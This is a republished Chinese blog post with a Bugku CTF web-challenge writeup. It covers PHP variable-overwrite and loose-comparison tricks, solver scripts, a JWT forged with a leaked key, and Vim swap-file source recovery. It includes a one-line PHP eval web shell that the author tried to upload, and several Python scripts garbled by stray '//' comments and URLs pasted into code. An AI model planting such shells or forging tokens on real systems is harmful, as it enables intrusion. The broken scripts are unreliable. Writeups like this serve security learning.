主頁 > 企業開發 > bugku—Web_Writeup

bugku—Web_Writeup

2020-09-12 05:07:56 企業開發

Bugku_Web_Writeup

Writeup略顯粗糙~~

部分Web題沒有得到最后的flag只是有了一個簡單的思路~

Web1:

img

如上,打開題目答題網址后就會彈出一張圖片,看圖片就可以發現是一段PHP原始碼,通過對原始碼的決議得出以下:

<?php
	header("Content-type:text/html;charset=utr-8");
	error_reporting(0);
	include 'flag.php';
	$b = 'ssAEDsssss';
	extract($_GET);
	// extract():將陣列中的鍵名設定為變數名,鍵值為變數中引數
	if (isset($a)) { // isset():檢查變數是否存在
		$c = trim(file_get_contents($b));
			// file_get_contents():將整個檔案讀入一個字串中
			// trim(): 函式可移除字串兩端的空白字符或其他預定義字符,因為沒有預定要刪的字符,所以會洗掉全部字符
				// 處理一個文本檔案中的資料讀入進一個字串中,利用上述兩個函式進行格式處理 
				// 結合 $c 變數最后得到的字串就是一個空內容 ===> $c = ' '
		if ($a == $c) { // 在之前isset()判斷是否存在$a變數,從php原始碼中沒有發現$a變數;故此在URL中可以構造一個變數a并空值
			echo $myFlag ; 
		} else {
			echo "No!";
		}
	}
?>

綜合分析:

PHP原始碼表達的flag顯示是在通過 isset($a) 和 $a == $c 判斷后echo顯示myFlag變數(即flag)以及原始碼中注釋說明,

我們需要的就是構造一個變數a給php原始碼,然而變數c在函式的聯合下,變數C的內容是空的,于是我們構造一個URL并且a變數為空

http://123.206.31.85:10001/?a=

Web2:

該題三秒自動重繪計算題和答案,所以需要在三秒內計算得出并填寫正確的答案獲取flag

如果按照人類的速度是……不可能的,于是只得借用腳本自動化了!

import requests,re
url = 'http://123.206.31.85:10002/'
// Session():模擬登錄操作
s = requests.Session() // 創建一個Session物件:s
def getURL(url):
	con = s.get(url) // 發送請求,使用默認得登錄屬性
	res = con.text // 獲取頁面text格式轉換得字串:res
	return res
def Calculation(text):
	result = eval(((re.findall(".*</p",text))[0])[0:-3]) // 正則篩選公式
	return result // 回傳計算公式的結果 result
def postRES():
	result =  Calculation(getURL(url)) //呼叫函式回傳網頁頁面內容再呼叫
	payload = {'result':result}
	r = s.post(url,data=https://www.cnblogs.com/wangyuyang1016/p/payload) // 模擬提交計算結果給服務端
	return r
print (postRES().text) // 回傳HTTP結果中的text資料

RUN后就可以得到我們想要的flag了!

*Web3:檔案包含

根據提示!得知網站允許我們上傳一張圖片!于是果斷上傳一句話木馬……

<?php eval($_POST[key]);?>

方法一:上傳php檔案

結果:失敗!

結論:設定了檔案型別審查

方法二:上傳png檔案,burp攔包改后綴.php

結果:失敗!

結論:不在客戶端進行,而是利用服務端進行檔案型別審查

…………

Web4:萬能登錄

可以看出是類后臺登錄的頁面,首先就是萬能密碼走一遍……

然后非常好玩的是……flag就出來了!搞得我還準備用brup爆破弱密碼呢……

*Web5:SQL注入

http://47.95.208.167:10005/

SQLMap注入:參考

Web6:管理員系統

眨眼一看,沒頭緒,我看了別人的Writeup,都說HTML代碼里有base64加密的password,但是原諒我“蠢”,沒有看見base64碼……

我按照“老”思路,扔了幾個字典跑了一下……(我用了六分鐘跑出來了)

哦!對了……記得修改X-Forwarded-For 的value為本地地址_從另一個角度可以認為這是一道關于偽造IP的題目!

*Web7:

[發貨系統]

web9:

頁面回傳如下一串字符:

put me a message bugku then you can get the flag 

意思就是讓我們通過PUT方式提交“bugku”給服務端

于是我們抓包修改資料包內容:

修改請求方式為:PUT

添加請求的資訊物體內容:bugku

點擊:Go ===>

就會回應flag,但是回傳的是看不懂的“亂碼”

然而并不是……通過Base64解碼可以得到正確的flag碼


web10*:JWT的危險

頁面顯示登錄框,我們使用burp抓包并Request:

從回傳的資料包看出提示,從尾部的三個等于號推斷是Base32編碼,于是我們使用Base32解碼為字串

從解密的字串可以認為是登錄名和密碼,我們使用解碼結果登錄:

通過嘗試從這段文字中發現,Vim崩潰并且網站有秘密……

Vim崩潰時檔案會備份快取,并且以*.swp檔案格式存盤;當然了,如果檔案正常關倍訓自動洗掉同名的swp格式檔案,

文字中說了,是在寫這個網站的主頁時崩潰的~

呦西!一下子就看見了~那么我們就下載保存打開“L3yx.php.swp”檔案

swp檔案下載后,利用vi -r [file]恢復技識訓復檔案

L3yx.php原始碼如下:

<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>在線日記本</title>
<form action="" method="POST">
  <p>username: <input type="text" name="username" /></p>
  <p>password: <input type="password" name="password" /></p>
  <input type="submit" value=https://www.cnblogs.com/wangyuyang1016/p/"login" />



<?php
    error_reporting(0);
    require_once'src/JWT.php';
    const KEY = 'L3yx----++++----';
    function loginkk()
    {
        $time = time();
        $token = [
          'iss'=>'L3yx',
          'iat'=>$time,
          'exp'=>$time+5,
          'account'=>'kk'
        ];
        $jwt = \Firebase\JWT\JWT::encode($token,KEY);//JWT認證方式
        setcookie("token",$jwt);
        header("location:user.php");
    }
    if(isset($_POST['username']) && isset($_POST['password']) && $_POST['username']!='' && $_POST['password']!='')
    {
        if($_POST['username']=='kk' && $_POST['password']=='kk123')
        {
            loginkk();
        }
        else
        {
            echo "賬號或密碼錯誤";
        }
    }
?>

在原始碼中發現使用了 JWT方法進行認證,且原始碼中存在JWT的密鑰"KEY = 'L3yx----++++----'"

從資料包中發現token;我們利用解碼工具進行:

JWT-token包含三部分:JWT頭部、JWT負載、JWT簽名

三部分之間使用 點 符號進行分隔

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9  [JWT頭部]
eyJpc3MiOiJMM3l4IiwiaWF0IjoxNTcwMDExNTQ1LCJleHAiOjE1NzAwMTE1NTAsImFjY291bnQiOiJrayJ9  [JWT負載]
aWma416iRo9Y55rdk2LNtkyTulVs98ZrCqj0nBLMzH8  [JWT簽名]

我們分別對三部分的編碼方式進行解碼:

JWT頭部—Base64解碼:

{"typ":"JWT","alg":"HS256"}

JWT負載—Base64解碼:

{"iss":"L3yx","iat":1570011545,"exp":1570011550,"account":"kk"}

*通過頭部的解碼發現JWT簽名使用的是HS256演算法

通過對頭部和負載兩部分的base64解碼結果進行HS256加密,可以得出JWT簽名部分編碼:

題意,提示我們使用“L3yx”用戶,于是我們修改JWT負載的用戶名(也需要留意時間戳問題:exp):

{"iss":"L3yx","iat":1570011545,"exp":1570033550,"account":"L3yx"}

然后構造一個JWT-token:https://jwt.io/

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJMM3l4IiwiaWF0IjoxNTcwMDE0MDg0LCJleHAiOjE1NzAwNTU1ODksImFjY291bnQiOiJMM3l4In0.Nvl06ImN7gBuBB4oFwQcgsyzt7zarNhA1vGAXxYksNA

通過Burp—Repeater構造一個發送到user.php的請求

最侄訓得正確的flag!


*Web11:

打開頁面,只顯示一行“We han't anything!”,騙子說這里啥都沒有~

但是留意以下抓包的源代碼回傳結果發現:

網頁的title頁面標題為“robots”,由此想起了“robots.txt”:

根據獲知的結果訪問“shell.php”

<form action="shell.php" method="get">
    substr(md5(<input type="text" name="password">), 0, 6) = 05862a<input type="submit">
</for

從原始碼和頁面可以初步認為,是需要提交一個數字被md5函式處理后再被substr函式處理的結果與7fdaf4形成相等,

PHP substr()函式:

substr( string , start , length)

回傳String字串中從start開始,length長度的字串

綜上,就是對MD5進行截斷比較,暴力解決!~


Web13:

詭異的框框,攔包看一看:

感覺太怪了,回傳包中有Password欄位資訊,于是Base64解碼:

…………

然而并不正確,于是將flag放入框中提交查詢:

于是思前想后,有反復幾次后發現:每一次都是不同的flag,所以我認為是要求在最快的時間內提交當前的flag才可以得到真正的flag~

import requests
import base64
url = 'http://123.206.31.85:10013/index.php'
r = requests.session()
r1 = r.post(url,data=https://www.cnblogs.com/wangyuyang1016/p/{'password':'flag'})
Password = r1.headers['password']
password = str(base64.b64decode(Password),'utf-8')[5:-1]
r2 = r.post(url,data=https://www.cnblogs.com/wangyuyang1016/p/{'password':password})
print(r2.text)

代碼決議:

? 獲取回應包的password欄位,提交到password表單中并提交,


Web14:

提示:“聽說備份了不少東西”

通過簡單的提示,可以確定網站存在原始碼泄露的可能

使用GitHack進行探測并嘗試恢復~


Web15:

提示:Vim編輯器

根據頁面和提示可以確定我們要找的flag不在index.php

不過,流程不變,先抓包看一看

果然,一抓包就看見了貓膩~

將hint欄位內容進行編碼分析(推測是十六進制)

MRWWY5DGM46T2

只有大寫字母和數字:Base32解碼

dmltfg==

兩個等于號:Base64解碼

Vim~

從最終的結果可以看出,Vim的備份檔案符號“~”

結合頁面提示“來錯了地方”,表示頁面沒錯但是位置錯了:

http://123.206.31.85:10015/index.php~

ps原頁面的地址是1ndex.php留下了一個小小的坑哦!

<?php
	header('content-type:text/html;charset=utf-8');
	include './flag.php';
	error_reporting(0);
	if(empty($_GET['id'])){
	    header('location:./1ndex.php');
	}else{
		$id = $_GET['id'];
		if (!is_numeric($id)) { //檢測變數是否為數字或數字字串
			$id = intval($id); //獲取變數的整數值
			switch ($id) {
				case $id>=0:
					echo "快出去吧,走錯路了~~~<br>";
					echo "這么簡單都不會么?";
					break;
				case $id>=10:
					exit($flag);
					break;
				default:
					echo "你走不到這一步的!";
					break;
			}
		}
	}
?>

分析原始碼發現,輸出flag的條件:接收一個值“id”,要求不是數字或數字字串,但要求大于等于10

原始碼的邏輯非常清楚,只要提交的是非數字的字符就可以顯示flag了!

但是~這里有一個坑 ~~~ 巨坑!!!

在這個頁面,無亂提交的是什么都是“Error”的~~~

因為它告訴你了不該來這個頁面仔細看看URL~~

http://123.206.31.85:10015/1ndex.php

一和i傻傻分不清處:

我們要訪問的必須是:index.php:


流量分析:

資料包檔案

打開檔案后,追蹤TCP流就可以了~

日志審計:

log檔案

要求從日志中找出黑客攻擊的痕跡~

一打開檔案資料太龐大了受不了呀~

疑似SQL注入攻擊的痕跡~

確定存在SQL注入的痕跡~

我們統計每次注入的引數,得到flag~

import re
log = open ('sql_log.txt','r').read()
find = re.findall(r'3D(.*)--',log)
for i in find:
    print(chr(int(i)),end="")

轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/10952.html

標籤:訊息安全

上一篇:途游斗地主加密協議分析及破解

下一篇:ThinkPHP<6.0 SQL注入代碼審計分析

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • IEEE1588PTP在數字化變電站時鐘同步方面的應用

    IEEE1588ptp在數字化變電站時鐘同步方面的應用 京準電子科技官微——ahjzsz 一、電力系統時間同步基本概況 隨著對IEC 61850標準研究的不斷深入,國內外學者提出基于IEC61850通信標準體系建設數字化變電站的發展思路。數字化變電站與常規變電站的顯著區別在于程序層傳統的電流/電壓互 ......

    uj5u.com 2020-09-10 03:51:52 more
  • HTTP request smuggling CL.TE

    CL.TE 簡介 前端通過Content-Length處理請求,通過反向代理或者負載均衡將請求轉發到后端,后端Transfer-Encoding優先級較高,以TE處理請求造成安全問題。 檢測 發送如下資料包 POST / HTTP/1.1 Host: ac391f7e1e9af821806e890 ......

    uj5u.com 2020-09-10 03:52:11 more
  • 網路滲透資料大全單——漏洞庫篇

    網路滲透資料大全單——漏洞庫篇漏洞庫 NVD ——美國國家漏洞庫 →http://nvd.nist.gov/。 CERT ——美國國家應急回應中心 →https://www.us-cert.gov/ OSVDB ——開源漏洞庫 →http://osvdb.org Bugtraq ——賽門鐵克 →ht ......

    uj5u.com 2020-09-10 03:52:15 more
  • 京準講述NTP時鐘服務器應用及原理

    京準講述NTP時鐘服務器應用及原理京準講述NTP時鐘服務器應用及原理 安徽京準電子科技官微——ahjzsz 北斗授時原理 授時是指接識訓通過某種方式獲得本地時間與北斗標準時間的鐘差,然后調整本地時鐘使時差控制在一定的精度范圍內。 衛星導航系統通常由三部分組成:導航授時衛星、地面檢測校正維護系統和用戶 ......

    uj5u.com 2020-09-10 03:52:25 more
  • 利用北斗衛星系統設計NTP網路時間服務器

    利用北斗衛星系統設計NTP網路時間服務器 利用北斗衛星系統設計NTP網路時間服務器 安徽京準電子科技官微——ahjzsz 概述 NTP網路時間服務器是一款支持NTP和SNTP網路時間同步協議,高精度、大容量、高品質的高科技時鐘產品。 NTP網路時間服務器設備采用冗余架構設計,高精度時鐘直接來源于北斗 ......

    uj5u.com 2020-09-10 03:52:35 more
  • 詳細解讀電力系統各種對時方式

    詳細解讀電力系統各種對時方式 詳細解讀電力系統各種對時方式 安徽京準電子科技官微——ahjzsz,更多資料請添加VX 衛星同步時鐘是我京準公司開發研制的應用衛星授時時技術的標準時間顯示和發送的裝置,該裝置以M國全球定位系統(GLOBAL POSITIONING SYSTEM,縮寫為GPS)或者我國北 ......

    uj5u.com 2020-09-10 03:52:45 more
  • 如何保證外包團隊接入企業內網安全

    不管企業規模的大小,只要企業想省錢,那么企業的某些服務就一定會采用外包的形式,然而看似美好又經濟的策略,其實也有不好的一面。下面我通過安全的角度來聊聊使用外包團的安全隱患問題。 先看看什么服務會使用外包的,最常見的就是話務/客服這種需要大量重復性、無技術性的服務,或者是一些銷售外包、特殊的職能外包等 ......

    uj5u.com 2020-09-10 03:52:57 more
  • PHP漏洞之【整型數字型SQL注入】

    0x01 什么是SQL注入 SQL是一種注入攻擊,通過前端帶入后端資料庫進行惡意的SQL陳述句查詢。 0x02 SQL整型注入原理 SQL注入一般發生在動態網站URL地址里,當然也會發生在其它地發,如登錄框等等也會存在注入,只要是和資料庫打交道的地方都有可能存在。 如這里http://192.168. ......

    uj5u.com 2020-09-10 03:55:40 more
  • [GXYCTF2019]禁止套娃

    git泄露獲取原始碼 使用GET傳參,引數為exp 經過三層過濾執行 第一層過濾偽協議,第二層過濾帶引數的函式,第三層過濾一些函式 preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'] (?R)參考當前正則運算式,相當于匹配函式里的引數 因此傳遞 ......

    uj5u.com 2020-09-10 03:56:07 more
  • 等保2.0實施流程

    流程 結論 ......

    uj5u.com 2020-09-10 03:56:16 more
最新发布
  • 使用Django Rest framework搭建Blog

    在前面的Blog例子中我們使用的是GraphQL, 雖然GraphQL的使用處于上升趨勢,但是Rest API還是使用的更廣泛一些. 所以還是決定回到傳統的rest api framework上來, Django rest framework的官網上給了一個很好用的QuickStart, 我參考Qu ......

    uj5u.com 2023-04-20 08:17:54 more
  • 記錄-new Date() 我忍你很久了!

    這里給大家分享我在網上總結出來的一些知識,希望對大家有所幫助 大家平時在開發的時候有沒被new Date()折磨過?就是它的諸多怪異的設定讓你每每用的時候,都可能不小心踩坑。造成程式意外出錯,卻一下子找不到問題出處,那叫一個煩透了…… 下面,我就列舉它的“四宗罪”及應用思考 可惡的四宗罪 1. Sa ......

    uj5u.com 2023-04-20 08:17:47 more
  • 使用Vue.js實作文字跑馬燈效果

    實作文字跑馬燈效果,首先用到 substring()截取 和 setInterval計時器 clearInterval()清除計時器 效果如下: 實作代碼如下: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta ......

    uj5u.com 2023-04-20 08:12:31 more
  • JavaScript 運算子

    JavaScript 運算子/運算子 在 JavaScript 中,有一些運算子可以使代碼更簡潔、易讀和高效。以下是一些常見的運算子: 1、可選鏈運算子(optional chaining operator) ?.是可選鏈運算子(optional chaining operator)。?. 可選鏈操 ......

    uj5u.com 2023-04-20 08:02:25 more
  • CSS—相對單位rem

    一、概述 rem是一個相對長度單位,它的單位長度取決于根標簽html的字體尺寸。rem即root em的意思,中文翻譯為根em。瀏覽器的文本尺寸一般默認為16px,即默認情況下: 1rem = 16px rem布局原理:根據CSS媒體查詢功能,更改根標簽的字體尺寸,實作rem單位隨螢屏尺寸的變化,如 ......

    uj5u.com 2023-04-20 08:02:21 more
  • 我的第一個NPM包:panghu-planebattle-esm(胖虎飛機大戰)使用說明

    好家伙,我的包終于開發完啦 歡迎使用胖虎的飛機大戰包!! 為你的主頁添加色彩 這是一個有趣的網頁小游戲包,使用canvas和js開發 使用ES6模塊化開發 效果圖如下: (覺得圖片太sb的可以自己改) 代碼已開源!! Git: https://gitee.com/tang-and-han-dynas ......

    uj5u.com 2023-04-20 08:01:50 more
  • 如何在 vue3 中使用 jsx/tsx?

    我們都知道,通常情況下我們使用 vue 大多都是用的 SFC(Signle File Component)單檔案組件模式,即一個組件就是一個檔案,但其實 Vue 也是支持使用 JSX 來撰寫組件的。這里不討論 SFC 和 JSX 的好壞,這個仁者見仁智者見智。本篇文章旨在帶領大家快速了解和使用 Vu ......

    uj5u.com 2023-04-20 08:01:37 more
  • 【Vue2.x原始碼系列06】計算屬性computed原理

    本章目標:計算屬性是如何實作的?計算屬性快取原理以及洋蔥模型的應用?在初始化Vue實體時,我們會給每個計算屬性都創建一個對應watcher,我們稱之為計算屬性watcher ......

    uj5u.com 2023-04-20 08:01:31 more
  • http1.1與http2.0

    一、http是什么 通俗來講,http就是計算機通過網路進行通信的規則,是一個基于請求與回應,無狀態的,應用層協議。常用于TCP/IP協議傳輸資料。目前任何終端之間任何一種通信方式都必須按Http協議進行,否則無法連接。tcp(三次握手,四次揮手)。 請求與回應:客戶端請求、服務端回應資料。 無狀態 ......

    uj5u.com 2023-04-20 08:01:10 more
  • http1.1與http2.0

    一、http是什么 通俗來講,http就是計算機通過網路進行通信的規則,是一個基于請求與回應,無狀態的,應用層協議。常用于TCP/IP協議傳輸資料。目前任何終端之間任何一種通信方式都必須按Http協議進行,否則無法連接。tcp(三次握手,四次揮手)。 請求與回應:客戶端請求、服務端回應資料。 無狀態 ......

    uj5u.com 2023-04-20 08:00:32 more